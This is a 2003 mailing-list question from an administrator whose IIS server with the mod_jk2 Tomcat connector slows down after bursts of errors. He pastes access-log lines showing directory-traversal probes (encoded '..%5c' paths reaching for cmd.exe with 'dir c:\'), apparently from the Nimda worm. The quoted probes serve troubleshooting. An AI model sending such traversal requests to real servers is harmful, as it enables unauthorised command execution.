I'm receiving some interesting warning messages from the mod_jk2 connector and from IIS in general.
In my IIS Log: 2003-03-04 09:14:08 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:14:10 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:14:11 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:14:12 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:14:12 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /c/winnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:14:14 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:14:15 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:14:16 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /d/winnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:14:17 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:14:17 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:14:19 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 - 2003-03-04 09:14:19 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 - 2003-03-04 09:14:21 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:14:22 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:14:41 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 - 2003-03-04 09:14:41 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:14:43 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:14:43 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:15:22 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:15:24 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:15:25 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:15:25 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:15:27 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 - 2003-03-04 09:15:27 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 - 2003-03-04 09:15:29 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:15:30 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:15:30 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:15:30 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:15:35 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:15:37 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 - 2003-03-04 09:15:43 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..A..A..A..Awinnt/system32/cmd.exe /c+dir+c:\ 403 - Note: I've removed the IP addresses from the above messages and replaced with xxx.xxx.xxx.xxx. **************************************************************************** ********************************** **************************************************************************** ********************************** In my Windows Application Event Log: Error: [jk_isapi_plugin.c (316)]: HttpFilterProc [/scripts/..%5c../winnt/system32/cmd.exe] contains one or more invalid escape sequences. Error: [jk_isapi_plugin.c (316)]: HttpFilterProc [/scripts/..%5c../winnt/system32/cmd.exe] contains one or more invalid escape sequences. Emerg: [jk_isapi_plugin.c (324)]: HttpFilterProc [/scripts/..A/../winnt/system32/cmd.exe] contains forbidden escape sequences. etc.... These emergencies and errors are followed by many warnings indicating that the connector workers have failed to forward to my Tomcat instance. The workers are latter re-enabled. These warning messages appear about every 4-5 hours. Initially, they don't seem to affect the tomcat connector, but, after the warnings are logged, if a user accesses the site, it takes an exceptionally long time for a page to be served. In watching the logs, the connector is reporting a bunch of connection failures, but it eventually recovers and re-enables. The site works fine afterwards. On some occasions, IIS must be stopped/started in order for the site to behave normally. Has anyone else witnessed this in a production environment. The kicker is that I cannot reproduce this problem on my development/testing machines. I've load tested those environments and the connector is performing beautifully. It was once I pushed to production and made IIS (damn IIS), available to the outside world. I've searched on the web, and it seems like these are indications of the NIMDA virus scanning the computer looking for vulnerabilities. Has anyone else seen these messages/errors? Why would they be hurting the tomcat connector? Any suggestions? Steve The information transmitted in this communication is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please destroy any copies, contact the sender and delete the material from any computer.